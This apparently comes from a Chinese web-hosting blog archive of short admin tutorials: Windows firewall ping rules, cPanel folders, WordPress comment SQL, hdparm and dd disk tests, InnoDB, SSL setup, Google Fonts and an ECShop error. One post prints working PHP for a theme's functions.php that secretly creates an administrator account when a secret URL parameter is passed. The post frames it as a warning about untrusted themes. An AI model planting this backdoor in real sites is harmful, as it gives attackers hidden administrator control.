一月 14th, 2016

出于安全因素考虑,在 Windows Server 2008 上是不允许从外部对其执行 Ping 指令的.
如果要配置允许被 Ping 通过以往的设置步骤会发现并不能从 Windows firewall 里找到 ICMP 的相关配置项,而该规则的操作现在必须通过“高级安全 Windows 防火墙” 进行配置。步骤如下:

打开管理工具中的“高级安全 Windows 防火墙”;
在左侧导航窗体中定位到“入站规则”,之后在入站规则中找到配置文件类型为“公共”的“文件和打印共享(回显请求 – ICMPv4-In)”规则,设置为允许。
注:我们可以根据需要选择在何种网络环境中(域、专用或公共)允许该规则,如果网络使用了IPv6,则同时要允许 ICMPv6-In 的规则。

此外,我们还可以通过命令行方式来执行入站 Ping 的规则是启用还是禁用,命令行如下:

    netsh firewall set icmpsetting 8
    netsh firewall set icmpsetting 8 disable

一月 14th, 2016

登陆cPanel面板后,我们可以通过  ftp或文件管理器 来查看/管理我们的网站文件。但是在产品初次开通时,账户下便已存在了一些文档目录,这些目录究竟是做些什么的呢?下面先看看一个已经建站了的cPanel账户的文件管理器截图

cpanel_folder

上面看到了这么多的网站目录,那么究竟哪些才是我们站长最需要经常接触?哪些是站长们可以删除?哪些是绝对不能删除的呢?下面就来看看这些目录的用途。

cPanel主机内各目录:

public_html 目录: 这是站长建站的时候最需要使用,也是整个cPanel目录系统中最重要的一个目录!这个目录是用来放置主机主域名所对应的网站文件。好比你的主机名称是 abc.com 那么对应的,你就应当将 abc.com 这个网站的文件直接放置在 public_html/目录下面。这里需要注意的是, abc.com 的网站文件(直接可访问的 index.php/index.htm/index.html文件)必须直接放置在这个目录下面。 即,public_html/index.php。

如果你将网页文件放置在了如下目录:public_html/a/index.php,那你就应该用 abc.com/a 来访问你的网站了。
www 目录:站长们在第一次接触cPanel主机目录的时候肯定会对这个目录非常的疑惑,其实可以把他理解为是 public_html/ 目录的快捷方程式。所有放置在 public_html/ 目录下文件都可以在 www/目录下查看到,反之亦然。
mail目录:这个目录是用来放置 mail 邮箱信息。包括邮件的收件箱,发件箱,草稿箱,垃圾箱等。所以,如果你对邮箱内容非常注重,那么就不要轻易删除这个目录了。
public_ftp目录:这个目录对应的是匿名FTP用户登陆所看到的文件夹目录,一般情况下站长用不到这个目录。站长可以通过 ftp账户功能来设置自己FTP用户所对应的目录。
etc目录:这个目录是用来放置账户相关的配置信息的,站长们一般不需要碰触这个目录。
tmp目录:这个目录是用来存放网站缓存文件的,这个目录一般会随着时间的推移而不断的增长。所以对于站长来说,如果你的主机商对文件数量存在限制(当然基本所有主机商都会),那么你就应当定期的清理一下这个目录。
access-log目录:这个目录是用来存放网站访问信息的快捷方式,网站的访问日志可以在原始访问日志中进行下载查看。
.lastlogin目录:一般只会存放上一次登陆者的IP地址。这个信息可以在cPanel左侧的Stats 状态栏中查看。
.开头的目录:这些目录多为cPanel系统的配置文件,站长们一般无须修改。

一月 14th, 2016

 是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实 程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

<?php
add_action( 'wp_head', 'my_backdoor' );
 
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'backdoor' ) ) {
            $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

  比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码 为:“pa55w0rd!” 的管理员。

  如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门

一月 14th, 2016

当然,如果只是要删除几条评论或者是其他一些简单的工作,WordPress的一个高效的内置评论管理接口就够了,我们能够方便的在 wordpress控制面板管理一些评论。如是批量删除评论或者其他有关评论的工作我们可以使用几个简单的SQL,能够更快更方便的解决。 在今天的wordpress教程中,我将向你展示一些超级有用的SQL查询来更轻松地管理你的WordPress评论。

  在这之前需要注意

  • 不要忘了在测试下面的任何查询之前先做好数据库的备份。
  • 不要忘记更改默认的表前缀wp_,在使用下面的SQL语句的时候。

  删除所有的垃圾评论

  当你wordpress垃圾评论队列中的数目超过10万条的时候,删除它们使用内置的“删除所有垃圾评论”按钮可能会导致一个PHP内存错误。 为了避免这种情况,只要用这个简单的SQL请求,一次删除所有垃圾评论。

DELETE from wp_comments WHERE comment_approved = 'spam'

  删除两个日期之间的所有评论

  有一个“垃圾评论攻击”在有限的时间内? 下面是一个简单的方法来删除两个日期之间的所有评论。

DELETE FROM wp_comments
WHERE comment_date > '2013-11-15 01:10:04'
AND comment_date <= '2013-11-20 00:10:04'

  删除所有等待审核的评论

  如果您的“待审核的评论”队列中充满了99%的垃圾评论,你不想一个个手动审查他们,这条SQL命令将帮组你立即清除所有等待审核的评论。

DELETE FROM wp_comments WHERE comment_approved = '0'

  立刻禁用所有文章的评论

  要禁用您所有的文章评论? 如果是用WordPress自带评论管理,你将会累死!为什么不利用这个超级简单的SQL查询?

UPDATE wp_posts SET comment_status = 'closed', ping_status = 'closed' WHERE comment_status = 'open'

  停用较老的文章评论

  为了限制垃圾评论,为什么不关闭较老的文章评论? 下面的SQL语句将早于2014年1月1日发表的所有文章自动关闭评论:

UPDATE wp_posts SET comment_status = 'closed' WHERE post_date < '2014-01-01' AND post_status = 'publish'

  当然,你可以根据你自己的需要调整修改相应的时间。

  删除指定评论者URL的评论

  如果你想删除该读者的所有留言,怎么办?这里是一个非常简单的方法来批量删除与特定URL中的所有评论,用一个简单的SQL查询。如果你只是想删除这些网址相关的内容,你可以使用它:

DELETE from wp_comments WHERE comment_author_url LIKE "%www.wpmee.com%" ;

  搜索和替换评论内容

  如果你要替换所有评论特定的词或句子,使用mysql的一个非常方便的SQL查询函数REPLACE即可解决问题。

UPDATE wp_comments SET `comment_content` = REPLACE (`comment_content`, 'OriginalText', 'ReplacedText')

  在全局范围内启用仅注册用户才能评论

  只有注册用户才能参与文章的评论,这样的方法避免了绝大多数的垃圾评论。

UPDATE wp_posts SET comment_status = 'registered_only'

  好了,教程就到这儿,不知道对你有用没呢?这些大多数都是一些简单的SQL查询语句,最后提醒,操作数据库一定要小心,操作之前请备份。

一月 14th, 2016

hdparm的功能:显示与设定硬盘的参数.hdparm可检测,显示与设定IDE或SCSI硬盘的参数.

 

语法:

hdparm [options选项(参数)] [device(设备)…]

参数:

-a<快速分区>  设定读取文件时,预先存入块区的分区数,若不加上<快速分区>选项,怎显示目前的设定;

-A<0/1>       启动或关闭读取文件时的快取功能;

-c            设定IDE32为I/O模式;

-C            检测IDE硬盘的电源管理模式;

-d<0/1>       设定磁盘的DMA模式;

-f            将内存缓冲区的数据写入硬盘,并清除缓冲区

-g            显示硬盘的磁轨,磁头,磁区等参数;

-h            显示帮助

-i            显示硬盘的硬件规格信息,这些信息是在开机时由硬盘本身所提供;

-I            直接读取硬盘所提供的硬件规格信息;

-k<0/1>       重设硬盘时,保留-dmu参数的设定;

-K<0/1>       重设硬盘时,保留-APSWXZ参数的设定;

-m<磁区数>    设定硬盘多重分区存取的分区数;

-n<0/1>       忽略硬盘写入时所发生的错误;

-p            设定硬盘的PIO模式;

-P<磁区数>    设定硬盘内存快取的分区数;

-q            在执行后续的参数时,不在屏幕上 显示任何信息;

-r<0/1>       设定硬盘的读写模式;

-S<时间>      设定硬盘进入省电模式前的等待时间;
-t            评估硬盘的读取效率;

-T            评估硬盘快取的读取效率;

-u<0/1>       在硬盘读取时,允许其他中断要求同时执行;

-v            显示硬盘的相关设定;

-W<0/1>       设定硬盘的写入快取;

-X<传输模式>  设定硬盘的才传输模式;

-y            使用IDE硬盘进入省电模式;

-Y            使用IDE硬盘进入睡眠模式;

-Z            关闭某些Seagate硬盘的自动省电功能     

 

 

<1>显示硬盘的相关设置

[root@sqj2015 ~]# hdparm /dev/vda

 

/dev/vda:

 HDIO_DRIVE_CMD(identify) failed: Inappropriate ioctl for device

 readonly      =  0 (off)

 readahead     = 256 (on)

 geometry      = 20805/16/63, sectors = 20971520, start = 0

 

20805/16/63, sectors = 20971520, start = 0 对应柱面数/磁头数/扇区数/总扇区数/起始扇区数

同样可以使用

[root@sqj2015 ~]# hdparm -g  /dev/vda

 

/dev/vda:

 geometry      = 20805/16/63, sectors = 20971520, start = 0

 

<2>测试硬盘/硬盘缓存的读取速度

[root@sqj2015 ~]# hdparm -t /dev/vda

 

/dev/vda:

 Timing buffered disk reads: 530 MB in  3.00 seconds = 176.66 MB/sec

[root@sqj2015 ~]# hdparm -T /dev/vda

 

/dev/vda:

 Timing cached reads:   7302 MB in  2.00 seconds = 3653.82 MB/sec

 

<3>检查硬盘的电源管理模式

[root@sqj2015 ~]# hdparm -C /dev/vda

 

/dev/vda:

 drive state is:  unknown

TAGS: ,
一月 14th, 2016

测试磁盘的IO写速度
[root@45-113-120-78 home]# time dd if=/dev/zero of=/test.dbf bs=8k count=300000
300000+0 records in
300000+0 records out
2457600000 bytes (2.5 GB) copied, 1.13061 s, 2.2 GB/s

real    0m1.132s
user    0m0.023s
sys     0m1.105s

 

测试磁盘的IO读速度
[root@45-113-120-78 home]# time dd if=/home/test of=/dev/null bs=8k
128000+0 records in
128000+0 records out
1048576000 bytes (1.0 GB) copied, 0.201303 s, 5.2 GB/s

real    0m0.204s
user    0m0.011s
sys     0m0.193s

磁盘读写速度

[root@45-113-120-78 home]#yum -y install hdparm
[root@45-113-120-78 home]#  hdparm -Tt /dev/vda

/dev/vda:
 Timing cached reads:   26894 MB in  2.00 seconds = 13462.99 MB/sec
 Timing buffered disk reads: 566 MB in  3.00 seconds = 188.60 MB/sec

一月 8th, 2016

连接mysql数据库
例如:我的mysql安装路径:D:\Program Files\PHPWEB\MySQL Server 5.5
cmd>>D:>>cd D:\Program Files\PHPWEB\MySQL Server 5.5\bin>>mysql -localhost -uroot -p>>键入password

连接mysql数据库后>>SHOW variables like “have_%”

查看have_innodb栏.

一般执行此命令,会有三种结果:
have_innodb YES
have_innodb NO
habe_innodb DISABLED
对应:
已经开启innodb引擎
未安装innodb引擎
未启用innodb引擎
针对第二种未安装,只需要安装即可;针对第三种未启用,则打开mysql配置文件(上面为例则在D:\Program Files\PHPWEB\MySQL Server 5.5\my.ini),找到skip-innodb项,将其改成#skip-innodb,之后重启mysql服务即可!!

十二月 24th, 2015

一、key、CSR文件的生成

  1、首先登录cPanel控制面板,找到下图位置,点击“SSL/TLS Manager”

  2、然后在下图中点击“Generate, view, upload, or delete your private keys.”

  3、将页面下拉到最底部,找到“Generate a New Key”,输入要生成CSR的网站名,或者在旁边的下拉菜单中选择。注意该处的网站名应该全域名(“Fully Qualified Domain Name ”)例如:www.domain.com or b2c.domain.com)

  4、点击“Generate ”,私钥就做好了,私钥会保存在服务器上,不需要复制出来

  5、回到前面的页面,点击“Generate, view, or delete SSL certificate signing requests. ”

  6、在这个页面中,输入下面资料:

  Host – 网站名,选择刚刚做好的那个私钥的网站名

  Country – 国家代码,2个大写字母,常用:CN。其他国家详见:ISO 3166-1 A2

  State – 省份,如:Shanghai

  City – 城市,如:Shanghai

  Company – 公司名称。

  Company Division – 部门,如:IT Dept。

  Email – 电子邮箱,可选。

  Pass Phrase – 密码

  7、点击“Generate”,CSR生成,请将CSR复制出来,保存为TXT文件,然后联系在线客服发给客服.之后会发送给您一封ssl证书确认邮件.您确认下就可以了.

  二、安装证书文件

  1、将证书内容存为一个文件:

  您会收到一封邮件,证书内容附在邮件中。如果证书是以附件的形式(Cert.cer)夹带在邮件中,您就可以直接应用它。如果您的证书中以文本的方式 存在邮件中,您就需要将邮件中的证书部分的内容用Vi或Notepad存成一个纯文本文件。不要将其存成Microsoft Word 或其它字处理软件格式,并确定证书内容中不含有空行和空格,文件名可以为server.crt。

  2、登录cPanel控制面板

  3、点击“SSL/TLS Manager”

  4、点击“Generate, view, upload, or delete SSL certificates”

  5、在“Upload a New Certificate section”下,将刚才server.crt中的内容,粘帖到下面的文本框中,然后点击“Upload”。

  6、点击“Go Back”返回“SSL Manager”

  7、点击“Setup a SSL certificate to work with your site”,如果没有这个项目,或者不可选,则说明主机商已经禁止了这个权限,请联系主机商,由他们来激活SSL证书。

  8、从下拉框中选中,你要安装证书的网站名,系统会尝试读出你安装过的CRT和KEY,如果没有找到,请在文本框中粘贴进去。

  9、点击“Install Certificate.”,证书安装成功,

  cPanel主机上安装SSL证书完毕!

十二月 24th, 2015

由于Google被彻底墙掉,不翻墙就无法加载谷歌字体。很多新手朋友经常抱怨自己买的主机如何如何慢,给的示例站秒开,可是自己的站要几十秒才能打开,而且是全新安装的WordPress网站,没有任何图片也很慢。其实很多时候WordPress速度慢并非主机的原因,而是因为谷歌字体,今天我们就给大家提供一个优化谷歌字体的超详细教程,小白专用。

如何查看自己的网站是否包含谷歌字体

首先,打开FireFox或者Chrome,进入隐身模式,Firefox可以用快捷键Ctrl+Alt+P,Chrome可以用快捷键Ctrl+Alt+N。

其次,进入开发者模式,两个浏览器都可以用快捷方式Ctrl+Alt+N进入。这里我们以FireFox为例。

Google-Fonts-1

然后访问你的网站,在窗口下方将加载的内容按域名排序,可以看到’fonts.googleapis.com’的内容,就说明你的WordPress确实引用了谷歌字体。

Google-Fonts-3

在Chrome中是这个样子:

Google-Fonts-2

优化谷歌字体方案1:

安装插件, 这个是最简单直接的方法,比较适合新手。在WordPress后台搜索‘disable Google fonts’,然后会出来一堆插件,排在前面的两个插件是“Disable Google Fonts”和“Remove Google Fonts References”。亲测“Remove Google Fonts Reference” 插件更有效。

Google-Fonts-4

优化谷歌字体方案2:

修改WordPress代码。 如果你可以通过FTP或者在线文件编辑器修改你的WP代码,这不失为一个有效的方法。对新手站长也不用担心,就算你没有任何代码基础,跟着教程一步一步做 就可以了。打开wp-includes/scriptes-loader.php文件,如果你通过FTP下载到了本地,建议使用notepad++打开。 使用Ctrl+H全文替换googleapis为useso,然后保存上传覆盖源文件。

Google-Fonts-5

究极解决方案:

如果以上几个方法都失效了,还有一个简单粗暴的方法,将WP所有文件打包下载到本地,当然,wp-content下的uploads文件夹可以不 用。然后使用notepad++“文件查找”的功能,将所有的googleapis替换为useso,然后上传覆盖已修改的文件。

Google-Fonts-6

不过,如果使用CDN加速,或者任何缓存插件的话,修改之后都要清空缓存,尤其是wp-total-cache等插件。

十二月 24th, 2015

ECShop是一款新颖的B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开 源程序。在今天,越来越多的个人甚至商家选择采用ECshop来构建自己的网络商城,相应的,在构建网站的过程中,肯定遇到了形形色色的问题,在这里,我 将会选择出其中的一个经典的问题来加以描述和提供解决方案。

 

我们在构建ECshop商城的时候其实只存在数据库的名称以及端口的选择问题等,如果您选择cPanel控制面板支持ECshop的一键安装的主机,在这一步上完全是没有任何问题的。而最主要的问题是产生在我们的商城构建完成过后,很多朋友反映在构建完成后网站首页显示大段的错误信息。

比如“Strict Standards: Only variables should be passed by reference in/hostingspace/ioaiowrc/public_html/ecshop/includes/cls_template.php on line 422

这个问题的产生是由于PHP5.3以上的版本不能识别explode的使用,所以你可以选择更换PHP5.2版本来进行解决。问题就在于如何更改PHP版本,在这里,如果您使用的是cPanel控制面板,你将可以很容易的进行此项操作。

第一步:进入cPanel控制面板,选择select PHP version。

 

picture2

 

第二步:选择PHP版本,需要注意的是,必须要保证zend optimizer的勾选。

picture3

 

这样,就能很好的解决Ecshop网站首页错误乱码的问题了。

那么对其他主机用户来说,又应该如何来进行修改呢?答案在PHP.ini配置文件当中,您可以进入您的文件夹管理中 public_html\ecshop\includes\cls_template.php文件,找到网站显示错误命令存在的那一行命令,然后将这行命 令($tag_sel = array_shift(explode(‘ ‘, $tag));)改为$tag_arr = explode(‘ ‘, $tag);和
$tag_sel = array_shift($tag_arr);